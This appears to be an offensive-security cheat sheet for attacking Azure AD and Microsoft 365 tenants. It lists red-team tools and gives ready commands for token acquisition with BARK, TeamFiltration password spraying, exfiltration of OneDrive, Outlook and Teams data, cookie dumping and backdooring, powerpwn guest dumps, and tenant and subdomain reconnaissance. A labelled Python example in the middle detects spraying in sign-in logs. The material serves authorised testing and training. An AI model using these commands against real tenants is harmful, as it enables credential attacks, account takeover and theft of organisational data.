Azure AD - Enumerate
Azure AD - Collectors
- Microsoft Portals - Microsoft Administrator Sites
- ROADTool - A collection of Azure AD tools for offensive and defensive security purposes
- BloodHoundAD/AzureHound - Azure Data Exporter for BloodHound
- BloodHoundAD/BARK - BloodHound Attack Research Kit
. .\BARK.ps1
$MyRefreshTokenRequest = Get-AZRefreshTokenWithUsernamePassword -username "user@contoso.onmicrosoft.com" -password "MyVeryCoolPassword" -TenantID "contoso.onmicrosoft.com"
$MyMSGraphToken = Get-MSGraphTokenWithRefreshToken -RefreshToken $MyRefreshTokenRequest.refresh_token -TenantID "contoso.onmicrosoft.com"
$MyAADUsers = Get-AllAzureADUsers -Token $MyMSGraphToken.access_token -ShowProgress
- dafthack/GraphRunner - A Post-exploitation Toolset for Interacting with the Microsoft Graph API
- NetSPI/MicroBurst - MicroBurst includes functions and scripts that support Azure Services discovery, weak configuration auditing, and post exploitation actions such as credential dumping
- hausec/PowerZure - PowerShell framework to assess Azure security
- silverhack/monkey365 - Microsoft 365, Azure subscriptions and Microsoft Entra ID security configuration reviews.
- Flangvik/TeamFiltration - TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\CookieData.txt --all
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --aad
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --tokens C:\\OutputTokens.txt --onedrive --owa
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --debug --exfil --onedrive
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-teams
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\Clients\2021\FooBar\OSINT\Usernames.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --backdoor
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --database
- Azure/StormSpotter - This repository has not been updated recently - Azure Red Team tool for graphing Azure and Azure Active Directory objects
- nccgroup/Azucar - This repository has been archived - Azucar automatically gathers a variety of configuration data and analyses all data relating to a particular subscription in order to determine security risks.
- FSecureLABS/Azurite Explorer - This repository has not been updated recently - Enumeration and reconnaissance activities in the Microsoft Azure Cloud.
- cyberark/SkyArk - This repository has not been updated recently - Discover the most privileged users in the scanned Azure environment - including the Azure Shadow Admins.
Azure AD - User Enumeration
Enumerate Tenant Information
- Federation with Azure AD or O365
- Get the Tenant ID
Enumerate from a Guest Account
powerpwn recon --tenant {tenantId} --cache-path {path}
powerpwn dump --tenant {tenantId} --cache-path {path}
powerpwn gui --cache-path {path}
Enumerate Emails
By default, O365 has a lockout policy of 10 tries, and it will lock out an account for one (1) minute.
- Validate email
- Extract email lists with valid credentials: https://github.com/nyxgeek/o365recon
Password Spraying
The default lockout policy tolerates 10 failed attempts, then locks out an account for 60 seconds.
- dafthack/MSOLSpray
- 0xZDH/o365spray
- Flangvik/TeamFiltration
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\Clients\2021\FooBar\Exclude_Emails.txt
TeamFiltration.exe --outpath C:\Clients\2023\FooBar\TFOutput --config myCustomConfig.json --spray --passwords C:\Clients\2021\FooBar\Generic\Passwords.txt --time-window 13:00-22:00
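Added example (not part of the original cheat sheet or of any tool listed here): a spray puts only one or two failures on each account, well under the per-account lockout threshold noted above, so detection has to count distinct accounts failing from one source instead. The records are constructed samples shaped like Microsoft Graph sign-in log entries; the 30-minute window and 10-account threshold are assumptions to tune.

```python
from collections import defaultdict
from datetime import datetime, timedelta

INVALID_PASSWORD = 50126  # AADSTS50126: invalid username or password
ACCOUNT_LOCKED = 50053    # AADSTS50053: account locked (smart lockout)

def _rec(ts, upn, ip, code):
    # Field names follow the Graph signIn resource; all values are constructed.
    return {"createdDateTime": ts, "userPrincipalName": upn,
            "ipAddress": ip, "status": {"errorCode": code}}

SAMPLE_SIGNINS = (
    # One source, one failure each against 12 different accounts.
    [_rec(f"2024-01-10T13:{m:02d}:00Z", f"user{m}@contoso.onmicrosoft.com",
          "203.0.113.7", INVALID_PASSWORD) for m in range(0, 24, 2)]
    # One user mistyping their own password four times, then succeeding.
    + [_rec(f"2024-01-10T13:0{m}:30Z", "alice@contoso.onmicrosoft.com",
            "198.51.100.20", INVALID_PASSWORD) for m in range(4)]
    + [_rec("2024-01-10T13:05:00Z", "alice@contoso.onmicrosoft.com",
            "198.51.100.20", 0)]
)

def find_spray_sources(signins, window=timedelta(minutes=30), min_accounts=10):
    """Return {ip: [accounts]} for sources whose failed sign-ins hit at least
    min_accounts distinct accounts inside one sliding time window."""
    failures = defaultdict(list)
    for r in signins:
        if r["status"]["errorCode"] in (INVALID_PASSWORD, ACCOUNT_LOCKED):
            ts = datetime.strptime(r["createdDateTime"], "%Y-%m-%dT%H:%M:%SZ")
            failures[r["ipAddress"]].append((ts, r["userPrincipalName"].lower()))
    flagged = {}
    for ip, events in failures.items():
        events.sort()
        best, start = set(), 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans <= `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            accounts = {upn for _, upn in events[start:end + 1]}
            if len(accounts) > len(best):
                best = accounts
        if len(best) >= min_accounts:
            flagged[ip] = sorted(best)
    return flagged

if __name__ == "__main__":
    for ip, accounts in find_spray_sources(SAMPLE_SIGNINS).items():
        print(f"{ip}: failed sign-ins against {len(accounts)} accounts")
```

Grouping on source IP alone misses sprays spread across many source addresses; the same sliding-window count can be keyed on another shared attribute of the sign-in records instead.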
Azure Services Enumeration
Enumerate Tenant Domains
Extract openly available information for the given tenant: aadinternals.com/osint
Invoke-AADIntReconAsOutsider -DomainName <DOMAIN>
Invoke-AADIntReconAsOutsider -Domain "company.com" | Format-Table
Invoke-AADIntReconAsOutsider -UserName "user@company.com" | Format-Table
Enumerate Azure Subdomains
PS> . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureSubDomains.ps1
PS> Invoke-EnumerateAzureSubDomains -Base <TENANT NAME> -Verbose
Subdomain                                   Service
---------                                   -------
<TENANT NAME>.mail.protection.outlook.com   Email
<TENANT NAME>.onmicrosoft.com               Microsoft Hosted Domain
Enumerate Services
- Using Az PowerShell module
# Enumerate resources
PS Az> Get-AzResource
# List all VM's the user has access to
PS Az> Get-AzVM
# Get all webapps
PS Az> Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
# Get all function apps
PS Az> Get-AzFunctionApp
# List all storage accounts
PS Az> Get-AzStorageAccount
# List all keyvaults
PS Az> Get-AzKeyVault
# Get all application objects registered using the current tenant
PS AzureAD> Get-AzureADApplication -All $true
# Enumerate role assignments
PS Az> Get-AzRoleAssignment -Scope /subscriptions/<SUBSCRIPTION-ID>/resourceGroups/RESEARCH/providers/Microsoft.Compute/virtualMachines/<VM-NAME>
PS Az> Get-AzRoleAssignment -SignInName test@<TENANT NAME>.onmicrosoft.com
# Check AppID Alternative Names/Display Name
PS AzureAD> Get-AzureADServicePrincipal -All $True | ?{$_.AppId -eq "<APP-ID>"} | fl
- Using az cli
Multi Factor Authentication
- dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services
References
- Bypassing conditional access by faking device compliance - @DrAzureAD - September 06, 2020
- CARTP-cheatsheet - Azure AD cheatsheet for the CARTP course
- Attacking Azure/Azure AD and introducing Powerzure - SpecterOps - Ryan Hausknecht - Jan 28, 2020
- Training - Attacking and Defending Azure Lab - Altered Security